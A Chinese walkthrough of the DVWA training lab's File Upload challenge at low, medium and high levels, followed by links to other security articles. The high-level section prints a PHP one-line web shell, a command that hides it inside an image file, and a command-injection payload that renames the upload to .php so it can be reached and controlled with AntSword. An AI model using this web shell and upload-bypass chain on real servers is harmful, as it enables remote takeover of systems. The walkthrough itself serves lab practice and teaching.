【dvwa靶场:File Upload系列】File Upload低-中-高级别,通关啦

目录

一、low级别,直接上传木马文件

1.1、准备一个木马文件

1.2、直接上传木马文件

1.3、访问木马链接

1.4、连接蚁剑

二、medium级别:抓包文件缀名

2.1、准备一个木马文件,修改后缀名为图片的后缀名

2.2、上传文件,打开burpSuite,抓上传的包,修改后缀名为php,放行

2.3、访问木马文件链接

2.4、连接蚁剑

三、high级别:木马图片,命令执行修改为木马文件

3.1、准备一个真实小图片,命名自定义,以下是示例

3.2、准备一个木马文件

3.3、生成木马图片:cmd进入图片文件夹所在路径,执行生成木马图片命令

[3.4、上传文件 ,成功后复制路径](#3.4、上传文件 ,成功后复制路径)

[3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件](#3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件)

​3.6、访问修改后的,就是修改后的路径:你的dvwa路径拼接上这个文件路径,回车就自动成功那个路径

3.7、蚁剑连接:木马链接和木马密码


一、low级别,直接上传木马文件

1.1、准备一个木马文件

1.2、直接上传木马文件

1.3、访问木马链接

1.4、连接蚁剑

二、medium级别:抓包文件缀名

2.1、准备一个木马文件,修改后缀名为图片的后缀名

2.2、上传文件,打开burpSuite,抓上传的包,修改后缀名为php,放行

2.3、访问木马文件链接

2.4、连接蚁剑

三、high级别:木马图片,命令执行修改为木马文件

3.1、准备一个真实小图片,命名自定义,以下是示例

3.2、准备一个木马文件

<?php @eval($_POST['pass']);?>

3.3、生成木马图片:cmd进入图片文件夹所在路径,执行生成木马图片命令

copy 真实图片.后缀名/b+木马文件.后缀名 木马图片.真实图片后缀名

3.4、上传文件 ,成功后复制路径

3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件

127.0.0.1|move ../../hackable/uploads/你的木马图片 ../../hackable/uploads/修改后的木马文件

例如我的:127.0.0.1|move ../../hackable/uploads/mua.jpg ../../hackable/uploads/mua.php

3.6、访问修改后的,就是修改后的路径:你的dvwa路径拼接上这个文件路径,回车就自动成功那个路径

http://127.0.0.1/dvwa/vulnerabilities/exec/../../hackable/uploads/mua.php直接回车,变成下方的木马文件链接

http://127.0.0.1/dvwa/hackable/uploads/mua.php

3.7、蚁剑连接:木马链接和木马密码

相关推荐
芯盾时代3 小时前
智能汽车的数字钥匙安全
物联网·安全·网络安全·汽车·信息与通信
浩浩测试一下5 小时前
Web渗透测试之XSS跨站脚本之JS输出 以及 什么是闭合标签 一篇文章给你说明白
前端·javascript·安全·web安全·网络安全·html·系统安全
浩浩测试一下7 小时前
Web渗透测试之XSS跨站脚本 防御[WAF]绕过手法
前端·web安全·网络安全·系统安全·xss·安全架构
DataDynamos数动实验室9 小时前
【计算机网络】IPSec的安全协议和封装模式
网络·计算机网络·网络安全
Aimin202211 小时前
网络安全---信息收集
网络安全
网络安全工程师老王11 小时前
HTML Application利用
网络安全·信息安全·渗透测试·html
Fofh_Stone15 小时前
新抓包工具使用体验
网络安全·ios·https·开发工具·tcp·抓包·windows抓包
IT 古月方源1 天前
跨站脚本攻击(XSS)详解
运维·服务器·前端·网络·tcp/ip·网络安全·xss